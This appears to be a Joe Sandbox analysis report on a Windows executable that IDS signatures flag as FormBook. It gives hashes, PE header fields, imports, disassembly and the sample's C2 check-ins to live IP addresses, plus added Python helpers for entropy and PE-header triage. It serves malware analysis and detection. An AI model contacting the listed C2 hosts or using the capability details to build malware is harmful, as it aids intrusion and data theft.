Preview: .....LFDHl.G...e.VO..lK<...GSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH.ZZNIL.:Y._.w.G....2'4s;F6($-;l%%&Z5.n%6kF,!v%8l....75*"}F9SkVLVLFDHM[S.z3,.d/1.k,!.R..t'4....p6+.^.f. ..]:'k,1.FDH4ZZNG..4Y.WMV0...4ZZNGSK4.OTM]MMDH`^ZNGSK4YOV<BLFDX4ZZ>CSK4.OV\VLFFH4\ZNGSK4YIVLVLFDH4*^NGQK4YOVLTL..H4JZNWSK4Y_VLFLFDH4ZJNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFj<Q".NGS_f]OV\VLF.L4ZJNGSK4YOVLVLFDH.ZZ.GSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNGSK4YOVLVLFDH4ZZNG
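The two dropped files differ sharply in the report's "Entropy (8bit)" field: 1.12 for the SQLite database (mostly empty pages) against 7.99 for the 288256-byte blob the sample itself wrote, which is why the latter is flagged "Encrypted: true". The code below is an added example, not part of the Joe Sandbox report: it computes the 8-bit Shannon entropy the report uses, then applies it per window so that an encrypted or packed region can be located inside a file whose overall figure is diluted by a low-entropy header. The buffers are constructed (a sparse header followed by pseudo-random bytes), and the 7.0 cut-off for calling a region encrypted is an assumption for this example, not Joe Sandbox's documented rule.

```python
"""Shannon entropy of a buffer and of fixed-size windows, the metric behind the
report's "Entropy (8bit)" and "Encrypted" fields.

Added example, not part of the Joe Sandbox report. Sample data is constructed;
ENCRYPTED_THRESHOLD is an assumption chosen for illustration.
"""
import math
import random
from collections import Counter

ENCRYPTED_THRESHOLD = 7.0   # assumption: bits per byte above which we call data encrypted/packed
WINDOW = 4096


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def window_entropy(data: bytes, window: int = WINDOW):
    """(offset, entropy) for each consecutive window of the buffer."""
    return [(off, entropy8(data[off:off + window])) for off in range(0, len(data), window)]


def high_entropy_regions(data: bytes, window: int = WINDOW, threshold: float = ENCRYPTED_THRESHOLD):
    """Merge adjacent windows at or above the threshold into (start, end) byte ranges."""
    regions = []
    for off, e in window_entropy(data, window):
        if e < threshold:
            continue
        end = min(off + window, len(data))
        if regions and regions[-1][1] == off:
            regions[-1] = (regions[-1][0], end)      # extend the previous region
        else:
            regions.append((off, end))
    return regions


def looks_encrypted(data: bytes) -> bool:
    return entropy8(data) >= ENCRYPTED_THRESHOLD


def build_sample() -> bytes:
    """Constructed input: 16 KiB of a sparse, SQLite-like header followed by 48 KiB
    of seeded pseudo-random bytes standing in for an encrypted payload."""
    rng = random.Random(20241001)
    low = (b"SQLite format 3\x00" + bytes(2032)) * 8            # 16384 bytes, near-zero entropy
    high = bytes(rng.getrandbits(8) for _ in range(49152))      # 49152 bytes, ~8 bits/byte
    return low + high


if __name__ == "__main__":
    sample = build_sample()
    print(f"whole file: {entropy8(sample):.3f} bits/byte, encrypted={looks_encrypted(sample)}")
    for start, end in high_entropy_regions(sample):
        print(f"high-entropy region {start:#x}-{end:#x} ({end - start} bytes)")
```

The whole-file value is what the report prints; the per-window pass is the extra step worth running on the 7.99 blob and on the sample itself (7.56 overall), since a packed executable usually shows a low-entropy stub followed by one contiguous high-entropy region that marks the encrypted payload to carve.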
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.561166328997874
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: N2Qncau2rN.exe
File size: 1'401'699 bytes
MD5: 47d011ced9bd433871f605c662c06b55
SHA1: fd2e3100dcad95fd1fc6614a71ba0ac15bd3b05e
SHA256: d649d0beff04be12fbad6cdb84d0f2460208309f845c890f0fa162a27d61051f
SHA512: 3963efa4bb57b9a16b18f4d740529464476760bba56ce2cb5ca44c60a082081eb5ed26838f585ea4f9a3937d77cd55e41606bdc847d0d34b8092e1dd5176fa5d
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCJ/g5aAwDH/UUgUdmcGsQm2yuxrM:7JZoQrbTFZY1iaCJY5athMsR2a
TLSH: CD55E121F5C69076C1B323B19E7EF36A963D79360336D29B27C42D221EA05416B3A773
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
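Every field from Entrypoint down to Subsystem Version Minor is read straight out of the COFF and optional headers, and two of them carry a security point the report leaves implicit: the image has RELOCS_STRIPPED set and its DLL Characteristics contain only TERMINAL_SERVER_AWARE, so neither DYNAMIC_BASE (ASLR) nor NX_COMPAT (DEP opt-in) is present and the binary loads at 0x400000 every time. The parser below is an added example, not part of the Joe Sandbox report and not its engine's code. It decodes a PE32 header into the same fields and derives the ASLR/DEP verdict. The input is a constructed header carrying the values listed above; the linker version and the .text section geometry are assumptions needed to make the entry-point lookup work.

```python
"""PE32 header triage: entry point, link timestamp, characteristics, ASLR/DEP.

Added example, not part of the Joe Sandbox report. build_sample_pe() constructs a
header with the reported values; linker version and .text geometry are assumed.
"""
import struct
from datetime import datetime, timezone

IMAGE_FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",            # ASLR opt-in
    0x0100: "NX_COMPAT",               # DEP opt-in
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
COFF_FMT = "<HHIIIHH"                  # Machine .. Characteristics (20 bytes)
SECTION_FMT = "<8sIIIIIIHHI"           # IMAGE_SECTION_HEADER (40 bytes)


def build_sample_pe() -> bytes:
    """Constructed PE32 image with the header values the report lists."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                    # e_lfanew -> PE signature
    coff = struct.pack(COFF_FMT,
                       0x014C,            # Machine: i386
                       1,                 # NumberOfSections (assumed: one .text section)
                       0x4F25BAEC,        # TimeDateStamp
                       0, 0,              # symbol table pointer/count
                       224,               # SizeOfOptionalHeader for PE32
                       0x0123)            # RELOCS_STRIPPED|EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE|32BIT_MACHINE
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHH",
                      0x010B, 10, 0,                 # PE32 magic, linker 10.0 (assumed for VS2010)
                      0, 0, 0,                       # SizeOfCode/InitializedData/UninitializedData
                      0x165C1,                       # AddressOfEntryPoint (RVA of 0x4165c1)
                      0x1000, 0,                     # BaseOfCode, BaseOfData
                      0x400000,                      # ImageBase
                      0x1000, 0x200,                 # SectionAlignment, FileAlignment
                      5, 0, 5, 0, 5, 0,              # OS, image and subsystem versions 5.0
                      0, 0, 0, 0,                    # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                      2,                             # Subsystem: Windows GUI
                      0x8000)                        # DllCharacteristics: TERMINAL_SERVER_AWARE only
    opt += bytes(224 - len(opt))
    text = struct.pack(SECTION_FMT, b".text", 0x30000, 0x1000, 0x30000, 0x400,
                       0, 0, 0, 0, 0x60000020)       # assumed geometry; CODE|EXECUTE|READ
    return bytes(dos) + b"PE\0\0" + coff + opt + text


def parse_pe(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _, nsect, ts, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, pe_off + 4)
    opt_off = pe_off + 24
    if struct.unpack_from("<H", data, opt_off)[0] != 0x010B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]
    image_base = struct.unpack_from("<I", data, opt_off + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt_off + 68)
    sections = []
    for i in range(nsect):
        name, vsize, va, *_ = struct.unpack_from(SECTION_FMT, data, opt_off + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize))
    entry_section = next((n for n, va, vs in sections if va <= entry_rva < va + vs), None)
    return {
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
        "entrypoint": image_base + entry_rva,
        "entrypoint_section": entry_section,
        "imagebase": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
        "characteristics": [n for b, n in IMAGE_FILE_CHARACTERISTICS.items() if chars & b],
        "dll_characteristics": [n for b, n in DLL_CHARACTERISTICS.items() if dll_chars & b],
        # ASLR needs DYNAMIC_BASE and a relocation table; RELOCS_STRIPPED rules it out.
        "aslr": bool(dll_chars & 0x0040) and not (chars & 0x0001),
        "dep": bool(dll_chars & 0x0100),
    }


if __name__ == "__main__":
    for k, v in parse_pe(build_sample_pe()).items():
        print(f"{k}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k}: {v}")
```

On the real sample the same fields give the same answer: a fixed 0x400000 load address with no DEP opt-in is typical of older or repackaged crimeware builds, and a 2012 timestamp on a file that was first seen in 2024 is either a stale packer stub or a forged stamp, which is worth noting next to the VS2010 compiler match below.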
Instruction (disassembly from the entry point 0x4165c1)
call 00007FAEED055F6Bh
jmp 00007FAEED04CDDEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FAEED04CF5Ah
cmp edi, eax
jc 00007FAEED04D0F6h
cmp ecx, 00000080h
jc 00007FAEED04CF6Eh
cmp dword ptr [004A9724h], 00000000h
je 00007FAEED04CF65h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FAEED04CF57h
jmp 00007FAEED04D332h
test edi, 00000003h
jne 00007FAEED04CF66h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FAEED04CF7Bh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FAEED04CF5Eh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007FAEEF4C5757h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FAEED04CF1Eh
rep movsd
jmp dword ptr [00000000h+edx*4]

The listing is the stock MSVC CRT start-up stub (a call to the security-cookie initializer followed by a jmp into the CRT entry), and the routine after the int3 padding is the CRT's memcpy with its dispatch through the jump tables at 00416654h, 004166D4h, 00416740h and 00416750h. The run from "inc cx" to the far "jmp 00007FAEEF4C5757h" is those jump-table entries (values of the form 0x004166xx) decoded as instructions, so it is data, not code; the real packer code is not reached within this window, and the entry point itself says nothing beyond confirming the VS2010 CRT identified below.
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T15:33:37.818114+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 60549 | 3.33.130.190 | 80 | TCP
2024-10-08T15:33:37.818114+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 60549 | 3.33.130.190 | 80 | TCP
2024-10-08T15:33:53.420266+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 60551 | 74.208.236.25 | 80 | TCP
